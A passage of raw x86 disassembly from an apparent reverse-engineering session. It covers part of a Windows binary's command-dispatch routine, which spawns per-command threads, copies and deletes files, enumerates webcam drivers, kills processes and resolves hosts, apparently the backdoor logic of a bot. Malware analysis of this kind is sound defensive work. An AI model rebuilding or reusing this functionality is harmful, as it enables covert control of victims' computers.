mov [ebp+var_C88], eax
jmp short loc_413C82
; ---------------------------------------------------------------------------
loc_413C7C: ; CODE XREF: sub_40FCA3+3FC8�j
mov [ebp+var_C88], ebx
loc_413C82: ; CODE XREF: sub_40FCA3+3FD7�j
movzx eax, [ebp+var_A5B]
mov esi, [ebp+s]
push 7Fh
push [ebp+hFile]
mov [ebp+var_C80], eax
lea eax, [ebp+var_F14]
mov [ebp+var_F18], esi
push eax
call sub_419300
mov eax, [ebp+var_4]
push edi
mov [ebp+var_C78], eax
mov eax, [ebp+var_8]
mov [ebp+var_C7C], eax
lea eax, [ebp+var_2EC]
push 438C64h
push eax
call sub_41795B
push esi
lea eax, [ebp+var_2EC]
push 19h
push eax
call sub_41741F
add esp, 24h
mov [ebp+var_C94], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_F18]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40D66D ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_C94]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_413D30
call GetLastError
push eax
push 438C18h
jmp loc_412712
; ---------------------------------------------------------------------------
loc_413D28: ; CODE XREF: sub_40FCA3+4093�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_413D30: ; CODE XREF: sub_40FCA3+4072�j
cmp [ebp+var_C74], ebx
jz short loc_413D28
jmp loc_412721
; ---------------------------------------------------------------------------
loc_413D3D: ; CODE XREF: sub_40FCA3+3F35�j
push 438BC0h
jmp loc_414B41
; ---------------------------------------------------------------------------
loc_413D47: ; CODE XREF: sub_40FCA3+2574�j
; sub_40FCA3+258B�j
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4100FB
cmp [ebp+var_C], ebx
jz loc_4100FB
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
push eax
lea eax, [ebp+var_2EC]
push [ebp+hFile]
push [ebp+lpExistingFileName]
push [ebp+var_94]
push 438BB0h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push 1FFh
push eax
push [ebp+addr]
call sub_419300
push edi
call sub_417ECF
add esp, 30h
test eax, eax
jle short loc_413DCE
push edi
call sub_417ECF
imul eax, 3E8h
pop ecx
push eax ; dwMilliseconds
call Sleep ; Sleep
loc_413DCE: ; CODE XREF: sub_40FCA3+4115�j
push 438B8Ch
call sub_40CB08
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_413DE2: ; CODE XREF: sub_40FCA3+2546�j
; sub_40FCA3+255D�j
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4100FB
cmp [ebp+var_C], ebx
jz loc_415F22
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
mov esi, eax
mov eax, dword ptr [ebp+lpNewFileName]
inc eax
push 438B84h
push eax
call sub_417D80
add esp, 10h
test eax, eax
push esi
lea eax, [ebp+var_2EC]
jz short loc_413E9E
push [ebp+hFile]
push [ebp+lpExistingFileName]
push [ebp+var_94]
push 438BB0h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push 1FFh
push eax
push [ebp+addr]
call sub_419300
push esi
lea eax, [ebp+var_2EC]
push 438B5Ch
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push eax
call sub_40CB08
push edi
call sub_417ECF
add esp, 38h
test eax, eax
jle loc_415F22
push edi
call sub_417ECF
add eax, [ebp+arg_24]
pop ecx
jmp loc_4100FE
; ---------------------------------------------------------------------------
loc_413E9E: ; CODE XREF: sub_40FCA3+418A�j
push 438B18h
jmp loc_41453B
; ---------------------------------------------------------------------------
loc_413EA8: ; CODE XREF: sub_40FCA3+2518�j
; sub_40FCA3+252F�j
push dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_2EC]
push 438B10h
push eax
call sub_41795B
push edi
call sub_417ECF
add esp, 10h
loc_413EC5: ; CODE XREF: sub_40FCA3+4289�j
test eax, eax
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
loc_413EDF: ; CODE XREF: sub_40FCA3+4F73�j
lea eax, [ebp+var_2EC]
push eax ; char
push 429108h ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E190
jmp loc_415B49
; ---------------------------------------------------------------------------
loc_413F08: ; CODE XREF: sub_40FCA3+24EA�j
; sub_40FCA3+2501�j
push [ebp+esi+var_88]
lea eax, [ebp+var_2EC]
push dword ptr [ebp+lpNewFileName]
push 438B04h
push eax
call sub_41795B
push edi
call sub_417ECF
add esp, 14h
jmp short loc_413EC5
; ---------------------------------------------------------------------------
loc_413F2E: ; CODE XREF: sub_40FCA3+24BC�j
; sub_40FCA3+24D3�j
push dword ptr [ebp+lpNewFileName]
lea eax, [ebp+var_2EC]
push 438AFCh
push eax
call sub_41795B
push edi
call sub_417ECF
add esp, 10h
test eax, eax
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
lea eax, [ebp+var_2EC]
push eax ; char
push 429108h ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E190
push dword ptr [ebp+lpNewFileName]
push edi
push 438AD0h
loc_413F92: ; CODE XREF: sub_40FCA3+4376�j
; sub_40FCA3+43E1�j ...
call sub_40CB7C
jmp loc_41583B
; ---------------------------------------------------------------------------
loc_413F9C: ; CODE XREF: sub_40FCA3+248E�j
; sub_40FCA3+24A5�j
cmp [ebp+var_C], ebx
jz loc_415F22
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_413FCD
push esi
lea eax, [ebp+var_2EC]
push 438AC8h
push eax
call sub_41795B
add esp, 0Ch
loc_413FCD: ; CODE XREF: sub_40FCA3+4313�j
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
lea eax, [ebp+var_2EC]
push eax ; char
push 429108h ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E190
push esi
push edi
push 438A9Ch
jmp loc_413F92
; ---------------------------------------------------------------------------
loc_41401E: ; CODE XREF: sub_40FCA3+2460�j
; sub_40FCA3+2477�j
cmp [ebp+var_C], ebx
jz loc_415F22
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415F22
push edi
call sub_417ECF
test eax, eax
pop ecx
jle loc_415F22
push edi
call sub_417ECF
cmp eax, 5DCh
pop ecx
jge loc_415F22
push esi ; char
push 429108h ; int
push edi
call sub_417ECF
imul eax, 234h
pop ecx
push dword ptr [eax+44B874h] ; s
call sub_40E190
push esi
push edi
push 438A70h
jmp loc_413F92
; ---------------------------------------------------------------------------
loc_414089: ; CODE XREF: sub_40FCA3+2432�j
; sub_40FCA3+2449�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415F22
push esi ; char
push 438A64h ; int
push [ebp+s] ; s
call sub_40E190
push esi
push 438A38h
jmp loc_414E02
; ---------------------------------------------------------------------------
loc_4140C0: ; CODE XREF: sub_40FCA3+2404�j
; sub_40FCA3+241B�j
push [ebp+lpExistingFileName]
push 43A8A0h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz loc_4100FB
push dword ptr [ebp+lpNewFileName] ; char
push 438A2Ch ; int
push [ebp+s] ; s
call sub_40E190
push edi
call sub_417ECF
imul eax, 3E8h
add esp, 10h
push eax ; dwMilliseconds
call Sleep ; Sleep
push [ebp+esi+var_88]
push dword ptr [ebp+lpNewFileName] ; char
push 43A988h ; int
push [ebp+s] ; s
call sub_40E190
push 438A08h
call sub_40CB08
jmp loc_414E07
; ---------------------------------------------------------------------------
loc_414126: ; CODE XREF: sub_40FCA3+23D6�j
; sub_40FCA3+23ED�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
call sub_4180D0
push dword ptr [ebp+arg_8]
mov esi, eax
call sub_4180D0
add eax, [ebp+var_C]
push dword ptr [ebp+lpNewFileName]
lea eax, [eax+esi+2]
push eax
call sub_417F60
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_415F22
push esi
lea eax, [ebp+var_2EC]
push 439244h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_2EC]
push ebx ; int
push eax ; int
push edi ; int
push [ebp+s] ; s
call sub_40E1D6
push esi
push edi
push 4389DCh
call sub_40CB7C
add esp, 2Ch
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_414194: ; CODE XREF: sub_40FCA3+23A8�j
; sub_40FCA3+23BF�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
call sub_4180D0
push dword ptr [ebp+arg_8]
mov esi, eax
call sub_4180D0
add eax, [ebp+var_C]
push dword ptr [ebp+lpNewFileName]
lea eax, [eax+esi+2]
push eax
call sub_417F60
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_415F22
push ebx ; int
push ebx ; int
push esi ; int
push edi ; int
push [ebp+s] ; s
call sub_40E1D6
push esi
push edi
push 4389B0h
call sub_40CB7C
loc_4141E2: ; CODE XREF: sub_40FCA3+310B�j
add esp, 20h
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_4141EA: ; CODE XREF: sub_40FCA3+237A�j
; sub_40FCA3+2391�j
cmp [ebp+var_C], ebx
jz loc_4100FB
push dword ptr [ebp+lpNewFileName]
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz loc_4100FB
push eax
push edi
call sub_40CA10
push edi
lea eax, [ebp+var_2EC]
push 438984h
push eax
call sub_41795B
add esp, 14h
jmp loc_4127CD
; ---------------------------------------------------------------------------
loc_414229: ; CODE XREF: sub_40FCA3+233A�j
; sub_40FCA3+2351�j
push edi
push [ebp+arg_1C]
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz loc_415F22
mov esi, [ebp+esi+hFile]
cmp esi, ebx
jz short loc_4142C0
push esi
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
lea eax, [ebp+var_2EC]
jz short loc_4142AE
push esi
push [ebp+hFile]
push [ebp+lpExistingFileName]
push [ebp+var_94]
push 438BB0h
push eax
call sub_41795B
lea eax, [ebp+var_2EC]
push 1FFh
push eax
push [ebp+addr]
call sub_419300
push esi
push edi
lea eax, [ebp+var_2EC]
push 438950h
push eax
call sub_41795B
add esp, 34h
inc [ebp+arg_24]
jmp loc_41482A
; ---------------------------------------------------------------------------
loc_4142AE: ; CODE XREF: sub_40FCA3+45B9�j
push 438910h
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_41482A
; ---------------------------------------------------------------------------
loc_4142C0: ; CODE XREF: sub_40FCA3+45A2�j
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push [ebp+s] ; s
push [ebp+arg_1C] ; int
push eax ; int
call sub_40C672
add esp, 0Ch
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
push edi
push 4388E8h
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
add esp, 24h
jmp loc_41482A
; ---------------------------------------------------------------------------
loc_414307: ; CODE XREF: sub_40FCA3+230C�j
; sub_40FCA3+2323�j
push 4388E0h
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_41436A
cmp [ebp+esi+hFile], ebx
jz short loc_414357
push [ebp+esi+hFile] ; hFile
call sub_408F04
cmp eax, 1
pop ecx
lea eax, [ebp+var_2EC]
jnz short loc_414350
push [ebp+esi+hFile]
push 4388A4h
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_41436A
; ---------------------------------------------------------------------------
loc_414350: ; CODE XREF: sub_40FCA3+4694�j
push 438868h
jmp short loc_414362
; ---------------------------------------------------------------------------
loc_414357: ; CODE XREF: sub_40FCA3+467C�j
push 438820h
lea eax, [ebp+var_2EC]
loc_414362: ; CODE XREF: sub_40FCA3+46B2�j
push eax
call sub_41795B
pop ecx
pop ecx
loc_41436A: ; CODE XREF: sub_40FCA3+4673�j
; sub_40FCA3+46AB�j
push 438818h
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_414401
mov dword ptr [ebp+arg_10], ebx
loc_414382: ; CODE XREF: sub_40FCA3+4749�j
lea eax, [ebp+var_9C0]
push 1FFh
push eax
lea eax, [ebp+Parameters]
push 0FFh
push eax
push dword ptr [ebp+arg_10]
call capGetDriverDescriptionA
test eax, eax
jz short loc_4143E5
lea eax, [ebp+var_9C0]
push eax
lea eax, [ebp+Parameters]
push eax
lea eax, [ebp+var_28A8]
push dword ptr [ebp+arg_10]
push 4387E4h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_28A8]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 28h
loc_4143E5: ; CODE XREF: sub_40FCA3+4702�j
inc dword ptr [ebp+arg_10]
cmp dword ptr [ebp+arg_10], 0Ah
jl short loc_414382
lea eax, [ebp+var_2EC]
push 4387B0h
push eax
call sub_41795B
pop ecx
pop ecx
loc_414401: ; CODE XREF: sub_40FCA3+46D6�j
push 4387A8h
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_4144A7
cmp [ebp+esi+hFile], ebx
jz short loc_414494
cmp [ebp+esi+var_88], ebx
jz short loc_414494
cmp [ebp+esi+var_84], ebx
jz short loc_414494
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_414494
push eax
call sub_417ECF
pop ecx
push eax ; int
push [ebp+esi+var_84]
call sub_417ECF
pop ecx
push eax ; int
push [ebp+esi+var_88]
call sub_417ECF
pop ecx
push eax ; wParam
push [ebp+esi+hFile] ; int
call sub_40913F
add esp, 10h
test eax, eax
lea eax, [ebp+var_2EC]
jnz short loc_41448D
push [ebp+esi+hFile]
push 43876Ch
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_4144A7
; ---------------------------------------------------------------------------
loc_41448D: ; CODE XREF: sub_40FCA3+47D1�j
push 438728h
jmp short loc_41449F
; ---------------------------------------------------------------------------
loc_414494: ; CODE XREF: sub_40FCA3+477A�j
; sub_40FCA3+4783�j ...
push 4386E0h
lea eax, [ebp+var_2EC]
loc_41449F: ; CODE XREF: sub_40FCA3+47EF�j
push eax
call sub_41795B
pop ecx
pop ecx
loc_4144A7: ; CODE XREF: sub_40FCA3+476D�j
; sub_40FCA3+47E8�j
push 433B80h
push edi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_414809
mov eax, [ebp+esi+hFile]
cmp eax, ebx
mov dword ptr [ebp+lpNewFileName], eax
jz loc_414553
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+addr], eax
jz short loc_414553
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov dword ptr [ebp+arg_10], eax
jz short loc_414553
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_414553
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_414553
push esi
call sub_417ECF
pop ecx
push eax ; int
push edi
call sub_417ECF
pop ecx
push eax ; int
push dword ptr [ebp+arg_10]
call sub_417ECF
pop ecx
push eax ; int
push [ebp+addr]
call sub_417ECF
pop ecx
push eax ; wParam
push dword ptr [ebp+lpNewFileName] ; int
call sub_409338
add esp, 14h
test eax, eax
lea eax, [ebp+var_2EC]
jnz short loc_414549
push dword ptr [ebp+lpNewFileName]
push 4386A0h
loc_41453B: ; CODE XREF: sub_40FCA3+4200�j
push eax
call sub_41795B
add esp, 0Ch
jmp loc_414809
; ---------------------------------------------------------------------------
loc_414549: ; CODE XREF: sub_40FCA3+488E�j
push 438650h
jmp loc_414801
; ---------------------------------------------------------------------------
loc_414553: ; CODE XREF: sub_40FCA3+4825�j
; sub_40FCA3+4837�j ...
push 438600h
lea eax, [ebp+var_2EC]
jmp loc_414801
; ---------------------------------------------------------------------------
loc_414563: ; CODE XREF: sub_40FCA3+2039�j
; sub_40FCA3+2050�j
push edi
push 1Dh
push 4385F8h
push 4385DCh
push [ebp+var_8]
push [ebp+var_4]
push [ebp+hFile]
push [ebp+s]
jmp loc_415B86
; ---------------------------------------------------------------------------
loc_414584: ; CODE XREF: sub_40FCA3+200B�j
; sub_40FCA3+2022�j
push 1Dh
call sub_417661
test eax, eax
pop ecx
jle short loc_41459A
push 4385ACh
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_41459A: ; CODE XREF: sub_40FCA3+48EB�j
mov eax, [ebp+s]
push edi
mov [ebp+var_384], eax
mov eax, [ebp+var_4]
mov [ebp+StartupInfo.hStdInput], eax
mov eax, [ebp+var_8]
push 4385A8h
mov [ebp+StartupInfo.hStdOutput], eax
mov [ebp+StartupInfo.lpReserved2], ebx
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_414616
mov esi, [ebp+esi+hFile]
mov [ebp+StartupInfo.lpReserved2], 1
cmp esi, ebx
jnz short loc_4145FD
mov esi, 4316A0h
push 440F9Ch
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4145FD
mov esi, [ebp+hFile]
loc_4145FD: ; CODE XREF: sub_40FCA3+493C�j
; sub_40FCA3+4952�j
push esi
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_417EDA
push 43856Ch
jmp short loc_414669
; ---------------------------------------------------------------------------
loc_414616: ; CODE XREF: sub_40FCA3+4927�j
push edi
push 438564h
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_4146E5
mov esi, [ebp+esi+hFile]
cmp esi, ebx
jnz short loc_414652
mov esi, 4316A0h
push 440F9Ch
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_414652
mov esi, [ebp+hFile]
loc_414652: ; CODE XREF: sub_40FCA3+4991�j
; sub_40FCA3+49A7�j
push esi
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_417EDA
push 43852Ch
loc_414669: ; CODE XREF: sub_40FCA3+4971�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 14h
lea eax, [ebp+var_2EC]
push ebx
push 1Dh
push eax
call sub_41741F
add esp, 0Ch
mov [ebp+var_380], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_384]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_402703 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_380]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_4146D8
call GetLastError
push eax
push 4384E0h
jmp loc_414BB9
; ---------------------------------------------------------------------------
loc_4146D0: ; CODE XREF: sub_40FCA3+4A3B�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_4146D8: ; CODE XREF: sub_40FCA3+4A1A�j
cmp [ebp+StartupInfo.hStdError], ebx
jz short loc_4146D0
jmp loc_412AF4
; ---------------------------------------------------------------------------
loc_4146E5: ; CODE XREF: sub_40FCA3+4982�j
push 4384ACh
jmp loc_412AE6
; ---------------------------------------------------------------------------
loc_4146EF: ; CODE XREF: sub_40FCA3+1D45�j
; sub_40FCA3+1D5C�j
push 42A9E8h
push edi
call sub_41924D
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
lea eax, [ebp+var_2EC]
jz short loc_414769
mov ebx, 200h
push esi
push ebx
push eax
call sub_41974C
add esp, 0Ch
jmp short loc_414745
; ---------------------------------------------------------------------------
loc_41471A: ; CODE XREF: sub_40FCA3+4AA4�j
push 1 ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
push esi
lea eax, [ebp+var_2EC]
push ebx
push eax
call sub_41974C
add esp, 20h
loc_414745: ; CODE XREF: sub_40FCA3+4A75�j
test eax, eax
jnz short loc_41471A
push esi
call sub_418F0B
push edi
lea eax, [ebp+var_2EC]
push 438478h
push eax
call sub_41795B
add esp, 10h
jmp loc_412742
; ---------------------------------------------------------------------------
loc_414769: ; CODE XREF: sub_40FCA3+4A63�j
push edi
push 438448h
jmp loc_412718
; ---------------------------------------------------------------------------
loc_414774: ; CODE XREF: sub_40FCA3+1D17�j
; sub_40FCA3+1D2E�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
push [ebp+var_C]
call sub_417F60
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_415F22
push 42AFB4h
push esi
call sub_417FF0
push esi ; lpBuffer
call sub_40BE55
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2EC]
jnz short loc_4147B7
push 43840Ch
jmp short loc_414801
; ---------------------------------------------------------------------------
loc_4147B7: ; CODE XREF: sub_40FCA3+4B0B�j
push esi
push 4383E4h
push eax
call sub_41795B
add esp, 0Ch
jmp short loc_41482A
; ---------------------------------------------------------------------------
loc_4147C8: ; CODE XREF: sub_40FCA3+1CE9�j
; sub_40FCA3+1D00�j
cmp [ebp+var_C], ebx
jz loc_415F22
push edi
push [ebp+var_C]
call sub_417F60
pop ecx
cmp eax, ebx
pop ecx
jz loc_415F22
push eax
call sub_40B43C
test eax, eax
pop ecx
lea eax, [ebp+var_2EC]
jnz short loc_4147FC
push 4383B8h
jmp short loc_414801
; ---------------------------------------------------------------------------
loc_4147FC: ; CODE XREF: sub_40FCA3+4B50�j
push 43838Ch
loc_414801: ; CODE XREF: sub_40FCA3+48AB�j
; sub_40FCA3+48BB�j ...
push eax
call sub_41795B
pop ecx
pop ecx
loc_414809: ; CODE XREF: sub_40FCA3+4813�j
; sub_40FCA3+48A1�j
cmp [ebp+var_8], ebx
jnz short loc_41482A
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_41482A: ; CODE XREF: sub_40FCA3+4606�j
; sub_40FCA3+4618�j ...
lea eax, [ebp+var_2EC]
push eax
loc_414831: ; CODE XREF: sub_40FCA3+17E0�j
call sub_40CB08
pop ecx
jmp loc_415F22
; ---------------------------------------------------------------------------
loc_41483C: ; CODE XREF: sub_40FCA3+1CBB�j
; sub_40FCA3+1CD2�j
push 7Fh
lea eax, [ebp+WSAData]
push edi
push eax
call sub_419300
mov esi, [ebp+esi+hFile]
add esp, 0Ch
cmp esi, ebx
jz short loc_41486B
push 7Fh
lea eax, [ebp+WSAData.szDescription+7Ch]
push esi
push eax
call sub_419300
add esp, 0Ch
loc_41486B: ; CODE XREF: sub_40FCA3+4BB4�j
push 7Fh
lea eax, [ebp+WSAData.szDescription+0FCh]
push [ebp+hFile]
push eax
call sub_419300
mov eax, [ebp+s]
push edi
mov [ebp+var_19FC], eax
mov eax, [ebp+var_8]
mov dword ptr [ebp+WSAData.szSystemStatus+7Fh], eax
mov eax, [ebp+var_4]
mov dword ptr [ebp+WSAData.iMaxUdpDg], eax
lea eax, [ebp+var_2EC]
push 438364h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 17h
push eax
call sub_41741F
add esp, 24h
mov dword ptr [ebp+WSAData.szSystemStatus+7Bh], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+var_19FC]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40C7E2 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, dword ptr [ebp+WSAData.szSystemStatus+7Bh]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_41491B
call GetLastError
push eax
push 438318h
loc_4148FF: ; CODE XREF: sub_40FCA3+5D88�j
lea eax, [ebp+var_2EC]
push eax
call sub_41795B
add esp, 0Ch
jmp loc_412742
; ---------------------------------------------------------------------------
loc_414913: ; CODE XREF: sub_40FCA3+4C7E�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_41491B: ; CODE XREF: sub_40FCA3+4C4E�j
cmp [ebp+WSAData.lpVendorInfo], ebx
jz short loc_414913
jmp loc_412742
; ---------------------------------------------------------------------------
loc_414928: ; CODE XREF: sub_40FCA3+1C8D�j
; sub_40FCA3+1CA4�j
push ebx ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
push edi ; int
call sub_406C89
push edi
push 4382F4h
jmp loc_413F92
; ---------------------------------------------------------------------------
loc_414943: ; CODE XREF: sub_40FCA3+1C5F�j
; sub_40FCA3+1C76�j
push 14h
lea eax, [ebp+var_96C]
push ebx
push eax
call sub_4179E0
push edi
lea eax, [ebp+var_958]
push 42744Ch
push eax
call sub_41795B
mov eax, [ebp+s]
mov [ebp+Parameter], eax
lea eax, [ebp+var_D4]
push eax
lea eax, [ebp+var_854]
push 80h
push eax
call sub_417EDA
mov eax, [ebp+var_4]
mov [ebp+var_7CC], eax
mov eax, [ebp+var_8]
mov [ebp+var_7C8], eax
lea eax, [ebp+var_854]
push eax
lea eax, [ebp+var_958]
push eax
lea eax, [ebp+var_2EC]
push 4382C0h
push eax
call sub_41795B
push ebx
lea eax, [ebp+var_2EC]
push 14h
push eax
call sub_41741F
add esp, 40h
mov [ebp+var_7D0], eax
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
lea eax, [ebp+Parameter]
push ebx ; dwCreationFlags
push eax ; lpParameter
push offset sub_40D090 ; lpStartAddress
push ebx ; dwStackSize
push ebx ; lpThreadAttributes
call CreateThread ; CreateThread
mov ecx, [ebp+var_7D0]
imul ecx, 234h
cmp eax, ebx
mov [ecx+44B87Ch], eax
jnz short loc_414A16
loc_4149FD: ; CODE XREF: sub_40FCA3+7A0�j
call GetLastError
push eax
push 438278h
jmp loc_413B05
; ---------------------------------------------------------------------------
loc_414A0E: ; CODE XREF: sub_40FCA3+4D79�j
push 32h ; dwMilliseconds
call Sleep ; Sleep
loc_414A16: ; CODE XREF: sub_40FCA3+4D58�j
cmp [ebp+var_7C4], ebx
jz short loc_414A0E
jmp loc_4105FA
; ---------------------------------------------------------------------------
loc_414A23: ; CODE XREF: sub_40FCA3+1C31�j
; sub_40FCA3+1C48�j
push edi ; lpFileName
call DeleteFileA ; DeleteFileA
test eax, eax
jz short loc_414A36
push edi
push 43824Ch
jmp short loc_414A41
; ---------------------------------------------------------------------------
loc_414A36: ; CODE XREF: sub_40FCA3+4D89�j
push 438D94h
call sub_40B377
push eax
loc_414A41: ; CODE XREF: sub_40FCA3+4D91�j
lea eax, [ebp+var_2EC]
push 200h
push eax
call sub_417EDA
jmp loc_414B19
; ---------------------------------------------------------------------------
loc_414A57: ; CODE XREF: sub_40FCA3+1C03�j
; sub_40FCA3+1C1A�j
push edi
call sub_417ECF
push eax ; dwProcessId
call sub_41645E
xor esi, esi
pop ecx
inc esi
pop ecx
cmp eax, esi
push edi
lea eax, [ebp+var_2EC]
jnz short loc_414A7A
push 438214h
jmp short loc_414A7F
; ---------------------------------------------------------------------------
loc_414A7A: ; CODE XREF: sub_40FCA3+4DCE�j
push 4381D0h
loc_414A7F: ; CODE XREF: sub_40FCA3+4DD5�j
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_412745
push ebx ; int
lea eax, [ebp+var_2EC]
push [ebp+var_4] ; int
push eax ; int
push [ebp+hFile] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
jmp loc_412745
; ---------------------------------------------------------------------------
loc_414AB2: ; CODE XREF: sub_40FCA3+1BD5�j
; sub_40FCA3+1BEC�j
push ebx ; int
push ebx ; int
push edi ; int
push [ebp+var_4] ; int
push ebx ; int
push [ebp+s] ; s
call sub_41615A
add esp, 18h
cmp eax, 1
lea eax, [ebp+var_2EC]
push edi
jnz short loc_414ADA
push 438198h
jmp loc_412718
; ---------------------------------------------------------------------------
loc_414ADA: ; CODE XREF: sub_40FCA3+4E2B�j
push 438158h
jmp loc_412718
; ---------------------------------------------------------------------------
loc_414AE4: ; CODE XREF: sub_40FCA3+1BA7�j
; sub_40FCA3+1BBE�j
push edi ; cp
call inet_addr_0
cmp eax, 0FFFFFFFFh
mov [ebp+addr], eax
jz short loc_414B21
push 2 ; type
lea eax, [ebp+addr]
push 4 ; len
push eax ; addr
call gethostbyaddr ; gethostbyaddr
cmp eax, ebx
jz short loc_414B3C
push dword ptr [eax]
loc_414B07: ; CODE XREF: sub_40FCA3+4E97�j
push edi
lea eax, [ebp+var_2EC]
push 43812Ch
push eax
call sub_41795B
loc_414B19: ; CODE XREF: sub_40FCA3+4DAF�j
add esp, 10h
jmp loc_412721
; ---------------------------------------------------------------------------
loc_414B21: ; CODE XREF: sub_40FCA3+4E4E�j
push edi ; name
call gethostbyname ; gethostbyname
cmp eax, ebx
jz short loc_414B3C
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax] ; in
call inet_ntoa_0
push eax
jmp short loc_414B07
; ---------------------------------------------------------------------------
loc_414B3C: ; CODE XREF: sub_40FCA3+4E60�j
; sub_40FCA3+4E87�j
push 4380F4h
loc_414B41: ; CODE XREF: sub_40FCA3+2082�j
; sub_40FCA3+22EC�j ...
lea eax, [ebp+var_2EC]
loc_414B47: ; CODE XREF: sub_40FCA3+210C�j
